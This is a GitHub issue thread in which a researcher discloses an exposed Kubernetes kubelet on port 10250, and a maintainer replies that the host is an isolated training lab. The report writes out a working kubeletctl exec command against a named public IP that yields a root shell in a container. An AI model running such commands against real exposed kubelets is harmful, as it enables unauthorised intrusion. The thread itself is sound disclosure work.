### ISSUE TITLE
Open port 10250 vulnerabilty lead to remote code execution.

### ISSUE THREAD

**Issue by nanwinata** [enix/kube-image-keeper#173]
Hi.

I found an IP associated with you on Shodan with a vulnerable Kubernetes port 10250 that is susceptible to Remote Code Execution (RCE). I'm searching for the best place to report this other than directly to Enix SAS on GitHub.
Usually, I report this for bug bounty purposes, but since I couldn't find your bug bounty program, I'm reporting it here instead

This is a vulnerable ip address:

![Screenshot 2023-09-18 082819](https://github.com/enix/kube-image-keeper/assets/50732289/e541412b-8224-4540-9736-44077cb040cd)

![Screenshot 2023-09-18 082906](https://github.com/enix/kube-image-keeper/assets/50732289/8aab04a9-a325-4466-becc-afdc5c318808)

Vulnerable pods and container is  blue-fc745d5bb-crx99             │ default     │ color
```
└─$ kubeletctl -s 45.140.108.163 exec "/bin/sh" -p "blue-fc745d5bb-crx99" -c "color"
/ # ^[[50;5Rid
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/ # ^[[51;5R
```
![Screenshot 2023-09-18 083019](https://github.com/enix/kube-image-keeper/assets/50732289/9963c849-37ec-41c7-830e-e25d6ac6b1b9)

I 
I hope you can fix it.

Regards

Nan

https://hackerone.com/nanwn

**Comment by jpetazzo** [comment]
Hi @nanwinata !

This machine is part of a lab environment for a Kubernetes training. In this training, we teach students how to set up a Kubernetes control plane; and in the first steps, we skip security - which is why kubelet ends up running openly like this. (I expect that there are more open components as well.) This particular machine will be recycled at the end of the week. Furthermore, even though the students get full (root) access to the machines (this is necessary to stage up a Kubernetes node), these machines are on a separate network and don't have access to other resources.

Thanks for notifying us, still, because if this had been a production system, we definitely would have needed to take quick action!
